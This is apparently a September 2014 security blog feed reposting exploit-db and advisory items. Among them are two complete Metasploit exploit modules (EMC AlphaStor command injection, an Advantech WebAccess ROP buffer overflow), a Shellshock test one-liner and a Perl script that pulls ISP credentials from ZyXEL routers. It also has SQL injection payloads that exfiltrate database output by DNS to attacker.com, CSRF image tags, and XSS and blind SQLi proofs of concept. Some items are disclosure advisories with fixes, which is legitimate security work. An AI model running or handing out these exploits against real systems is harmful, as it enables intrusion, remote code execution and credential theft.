GNU bash Environment Variable Command Injection

September 25, 2014, 12:29 am

≫ Next: Metasploit: EMC AlphaStor Device Manager Opcode 0x75 Command Injection

≪ Previous: Bash Environment Variables Code Injection Exploit

$

0

0

Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test


Authored by Stephane Chazelas



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

---

Metasploit: EMC AlphaStor Device Manager Opcode 0x75 Command Injection

September 25, 2014, 12:33 am

≫ Next: Metasploit: Advantech WebAccess dvs.ocx GetColor Buffer Overflow

≪ Previous: GNU bash Environment Variable Command Injection

$

0

0

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
      'Description'     => %q{
        This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
        command, the process does not properly filter user supplied input allowing for arbitrary
        command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
        with Windows 2003 SP2 and Windows 2008 R2.
      },
      'Author'          =>
        [
          'Anyway <Aniway.Anyway[at]gmail.com>',               # Vulnerability Discovery
          'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
          'Mohsan Farid <faridms[at]gmail.com>',               # msf module
          'Brent Morris <inkrypto[at]gmail.com>',              # msf module
          'juan vazquez'                                       # convert aux module into exploit
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['CVE', '2013-0928'],
          ['ZDI', '13-033']
        ],
      'Platform'        => 'win',
      'Arch'            => ARCH_X86,
      'Payload'         =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'  =>
          [
            [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
          ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Jan 18 2013'))

    register_options(
      [
        Opt::RPORT(3000)
      ], self.class )
  end

  def check
    packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
    res = send_packet(packet)
    if res && res =~ /Could not fork command/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    execute_cmdstager({ :linemax => 487 })
  end

  def execute_command(cmd, opts)
    padding = rand_text_alpha_upper(489 - cmd.length)
    packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
    connect
    sock.put(packet)
    begin
      sock.get_once
    rescue EOFError
      fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
    end
    disconnect
  end

  def execute_cmdstager_begin(opts)
    if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
      cmd_list.each do |cmd|
        cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
      end
    end
  end

  def send_packet(packet)
    connect

    sock.put(packet)
    begin
      meta_data = sock.get_once(8)
    rescue EOFError
      meta_data = nil
    end

    unless meta_data
      disconnect
      return nil
    end

    code, length = meta_data.unpack("N*")

    unless code == 1
      disconnect
      return nil
    end

    begin
      data = sock.get_once(length)
    rescue EOFError
      data = nil
    ensure
      disconnect
    end

    data
  end

end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: Advantech WebAccess dvs.ocx GetColor Buffer Overflow

September 25, 2014, 12:33 am

≫ Next: Quick notes about the bash bug, its impact, and the fixes so far

≪ Previous: Metasploit: EMC AlphaStor Device Manager Opcode 0x75 Command Injection

$

0

0

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE 9.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions'      =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'             =>
        {
          'Space'           => 1024,
          'DisableNops'     => true,
          'BadChars'        => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
        },
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Targets'             =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'       => 0,
      'DisclosureDate'      => 'Jul 17 2014'))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end

  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61) # offset
    xpl << [0x60014185].pack("V")    # RET
    xpl << rand_text_alphanumeric(8)

    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
    xpl << code

    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping

    xpl
  end

end




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Quick notes about the bash bug, its impact, and the fixes so far

September 25, 2014, 3:28 am

≫ Next: SE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow

≪ Previous: Metasploit: Advantech WebAccess dvs.ocx GetColor Buffer Overflow

$

0

0

We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise, especially earlier in the day.
Let's start with the nature of the bug. At its core, the problem caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables.

more here............http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html

and more on the bug here ...............http://garage4hackers.com/entry.php?b=3087

SE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow

September 25, 2014, 2:15 am

≫ Next: SpoofMAC - Spoof your MAC address

≪ Previous: Quick notes about the bash bug, its impact, and the fixes so far

$

0

0

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 ===

Perl CORE - Deep Recursion Stack Overflow
-----------------------------------------

Affected Versions
=================
Perl v5.20.1 and below


Issue Overview
==============
Vulnerability Type: Stack Overflow
Technical Risk: high
Likelihood of Exploitation: low
Vendor: Perl
Vendor URL: http://www.perl.org
Credits: LSE Leading Security Experts GmbH employee Markus Vervier
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-06-10.txt
Advisory Status: Public
CVE-Number: CVE-2014-4330
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4330


Impact
======
When the runtime stack grows over its maximal size, a guard page on most modern
operating systems is hit causing the Perl interpreter to crash.
Depending on context code execution on some architectures might be possible
if certain conditions are met.


Issue Description
=================
During internal development a stack overflow was discovered when serializing
data via the Data::Dumper extension which is part of Perl-Core.
By using the "Dumper" method on a large Array-Reference which recursively
contains other Array-References, it is possible to cause many recursive
calls to the DD_dump native function and ultimately exhaust all available stack
memory.


Temporary Workaround and Fix
============================
Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.

According to the vendor a patch is available and coordinated with downstream
vendors.


Proof of Concept
================
$ cat min.pl
use strict;
use Data::Dumper;

my $dumpme = [];
for (my $i = 0; $i < $ARGV[0]; $i++) {
        $dumpme = [$dumpme, "AAAAAAAA"];
}
print Dumper($dumpme);

$ gdb --args perl min.pl 20000
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/bin/perl...Reading symbols from
/usr/lib/debug/usr/bin/perl...done.
done.
(gdb) run
Starting program: /usr/bin/perl min.pl 20000
warning: no loadable sections found in added symbol-file system-supplied
DSO at
0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",
    ap=0x7fffff7ff6f0) at vfprintf.c:1328
1328    vfprintf.c: No such file or directory.

It was confirmed that the overflow can be triggered via the XML::Parser
extension when parsing and dumping specially crafted XML-Documents.


History
=======
2014-06-10 Issue discovery during internal development
2014-06-11 Vendor contacted
2014-06-11 Vendor reply
2014-06-13 CVE requested
2014-07-01 Vulnerability confirmed by vendor
2014-07-02 CVE-2014-4330 assigned
2014-09-25 Advisory released

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

SpoofMAC - Spoof your MAC address

September 25, 2014, 2:16 am

≫ Next: Ok, shits real. Its in the wild.

≪ Previous: SE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow

$

0

0

For OS X, Windows, and Linux (most flavors)

I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame.

Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too!

more here..........https://github.com/feross/SpoofMAC

Ok, shits real. Its in the wild.

September 25, 2014, 3:33 am

≫ Next: Two SQL Injections in All In One WP Security WordPress plugin

≪ Previous: SpoofMAC - Spoof your MAC address

$

0

0

First in-wild attack to hit my sensors -Remote exploit vulnerability in bash CVE-2014-6271
here............https://gist.github.com/anonymous/929d622f3b36b00c0be1

Two SQL Injections in All In One WP Security WordPress plugin

September 25, 2014, 4:37 am

≫ Next: ZyXEL Prestig P-660HNU-T1v2 Credential Disclosure

≪ Previous: Ok, shits real. Its in the wild.

$

0

0

Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector.

1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242

1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28selec
t%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%2
8%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%
29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,C
HAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%
28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select
%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28
%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%2
9,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CH
AR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%2
8111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28selec
t%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%2
8%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%
29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,C
HAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%
28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:

<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28
select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20vers
ion%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%
2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846
%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,
CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%2
9%29">

------------------------------------------------------------------------
-----------------------

Solution:

Update to All In One WP Security 3.8.3

More Information:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/change
log/

------------------------------------------------------------------------
-----------------------

References:

[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

------------------------------------------------------------------------
-----------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

---

ZyXEL Prestig P-660HNU-T1v2 Credential Disclosure

September 25, 2014, 4:39 am

≫ Next: Paper: Malware Propagation in Large-Scale Networks

≪ Previous: Two SQL Injections in All In One WP Security WordPress plugin

$

0

0

#!/usr/bin/perl
# Exploit Author: Sebastián Magof
# Hardware: ZyXEL Prestig P-660HNU-T1
# Vulnerable file: wzADSL.asp
# location: http://gateway/cgi-bin/wzADSL.asp
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 22/09/2014
# Vendor Homepage: http://www.zyxel.com/
# Version: 2.00(AAIJ.1)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n************************************************************\n";
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd     *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";#in oher country modify $url line 25


#isp pwd disclosure file
my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
 

#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
 

#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $pwd\n\n";
exit(0);



__EOF__



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Paper: Malware Propagation in Large-Scale Networks

September 25, 2014, 6:50 am

≫ Next: HAKA Runtime

≪ Previous: ZyXEL Prestig P-660HNU-T1v2 Credential Disclosure

$

0

0

Abstract—Malware is pervasive in networks, and poses a critical threat to network security. However, we have very limited understanding of malware behavior in networks to date. In this paper, we investigate how malware propagate in networks from a global perspective. We formulate the problem, and establish a rigorous two layer epidemic model for malware propagation from network to network. Based on the proposed model, our analysis indicates that the distribution of a given malware follows exponential distribution, power law distribution with a short exponential tail, and power law distribution at its early, late and final stages, respectively. Extensive experiments have been performed through two real-world global scale malware data sets, and the results confirm our theoretical findings.

more here...............http://faculty.cse.tamu.edu/guofei/paper/MalSize-TKDE14.pdf

HAKA Runtime

September 25, 2014, 10:09 am

≫ Next: shellshock-hunter

≪ Previous: Paper: Malware Propagation in Large-Scale Networks

$

0

0

What is HAKA

Haka is a collection of tool that allows capturing TCP/IP packets and filtering them based on Lua policy files.


more here.............https://github.com/haka-security/haka

shellshock-hunter

September 25, 2014, 11:10 am

≫ Next: MSA-2014-02: Typo3 Extension dmmjobcontrol Multiple Vulnerabilities (typo3-ext-sa-2014-012)

≪ Previous: HAKA Runtime

$

0

0

Search Bing and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock.


more here.............https://github.com/DanMcInerney/shellshock-hunter

MSA-2014-02: Typo3 Extension dmmjobcontrol Multiple Vulnerabilities (typo3-ext-sa-2014-012)

September 25, 2014, 2:13 pm

≫ Next: A guide to RegRipper and the art of timeline building

≪ Previous: shellshock-hunter

$

0

0

Mogwai Security Advisory MSA-2014-02
----------------------------------------------------------------------
Title:              JobControl (dmmjobcontrol) Multiple Vulnerabilities
Product:            dmmjobcontrol (Typo3 Extension)
Affected versions:  2.14.0
Impact:             high
Remote:             yes
Product link:       http://typo3.org/extensions/repository/view/dmmjobcontrol
Reported:           05/09/2014
by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)


Vendor's Description of the Software:
----------------------------------------------------------------------
JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs
("vacancies") on your website. It provides a list- and detail view and
the ability to search and apply for jobs. It can even make RSS feeds of
your joblist.

It works with html templates so it's easy to configure how the extension
will look for your site. The list can be shown as a "paginated list",
including a page-browser. The extension itself is multi-lingual, at this
moment English, Danish, Polish, German, Russian and Dutch are included.
The best feature however is that multi-lingual jobs are fully supported
too, so you can provide a translation for a job if you have a multi-lingual
site.

JobControl uses MM-relation tables for regions, branches, sectors etc.
This means that for every new site, you can make a new list of branches to
use. They are not hardcoded and don't require any TypoScript to set up.

JobControl is very easy to set up, with good default templates that can
be styled to your needs using css stylesheets. It's very powerful and
flexible too with lots of configuration options for advanced users.


Business recommendation:
----------------------------------------------------------------------
According to the Typo3 Security Team the extension maintainer does not
maintain the extension any longer and thus, is not providing an update.

Exploitation can be prevented with the workaround below. However, the
extension should be replaced with a maintained alternative.

Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
dmmjobcontrol provides a search function for the job database. Several
input fields (for example education, region, sector) are used without
proper sanitization to create the SELECT statement of the search query.

2) Reflected Cross Site Scripting (XSS)
The value of the "keyword" parameter is used without any sanitization
to create the html response of the search request. This can be abused
to inject malicious HTML/JavaScript code into the HTML response.


Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
The following PoC shows blind based SQL injection on the sector parameter, other
parameters are also vulnerable
http://xxxx/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20

2) Reflected Cross Site Scripting (XSS)
http://172.16.37.232/typo3/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bkeyword%5D=">

Vulnerable / tested versions:
----------------------------------------------------------------------
dmmjobcontrol 2.14.0


Disclosure timeline:
----------------------------------------------------------------------
05/09/2014: Reporting to the Typo3 Security team
05/09/2014: Response from Typo3 Security team that they received the mail
24/09/2014: Mail to Typo3 Security team, asking for the current status
25/09/2014: Response from Typo3 Security Team that they released an advisory[1]
25/09/2014: Release of public advisory


Workaround (use on your own responsiblity):
----------------------------------------------------------------------
In the file:
typo3conf/ext/dmmjobcontrol/pi1/class.tx_dmmjobcontrol_pi1.php

To fix the Cross Site Scripting (XSS) vulnerability, replace line 112 with the
following PHP code:
$markerArray['###KEYWORD_VALUE###'] =
htmlspecialchars($session['search']['keyword'], ENT_QUOTES);

To fix the SQL Injection vulnerability, replace line 257 with the following
PHP code:
$whereAdd[] = $table.'.uid_local=tx_dmmjobcontrol_job.uid AND
('.$table.'.uid_foreign='.implode(' OR '.$table.'.uid_foreign=',
intval($value)).')';


References:
----------------------------------------------------------------------
[1] TYPO3-EXT-SA-2014-012: Several vulnerabilities in extension JobControl
(dmmjobcontrol)
http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-012

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab


----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

Tel. +49 731 205 89 0
Fax +49 731 205 89 29
info@mogwaisecurity.de

A guide to RegRipper and the art of timeline building

September 25, 2014, 6:03 pm

≫ Next: National Express print-at-home vulnerability

≪ Previous: MSA-2014-02: Typo3 Extension dmmjobcontrol Multiple Vulnerabilities (typo3-ext-sa-2014-012)

$

0

0

I have often heard RegRipper mentioned on forums and websites and how it was supposed to make examining event logs, registry files and other similar files a breeze. RegRipper is developed and maintained by Harlan Carvey, who is the author of several blogs, numerous books and tools, and is also very active in the forensic community in general.

RegRipper is a tool that can be used to quickly extract values of interest from within the registry. It is NOT a registry browser. You do not get the option to browse through the registry. That can quickly overwhelm any analyst.

Instead it extracts only values of potential interest and presents it in a document for easier reading.


more here...........http://articles.forensicfocus.com/2014/09/25/a-guide-to-regripper-and-the-art-of-timeline-building/

National Express print-at-home vulnerability

September 26, 2014, 2:22 am

≫ Next: SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability

≪ Previous: A guide to RegRipper and the art of timeline building

$

0

0

This is a fine example of developers being lazy and how not to implement "security".

National Express are one of the biggest public transport companies in the UK with a huge fleet of coaches and trains.

This vulnerability discloses customers information to a potential attacker such as the passengers names, destination, last 4 digits of the card, price the customer paid for the tickets and of course the ticket itself.


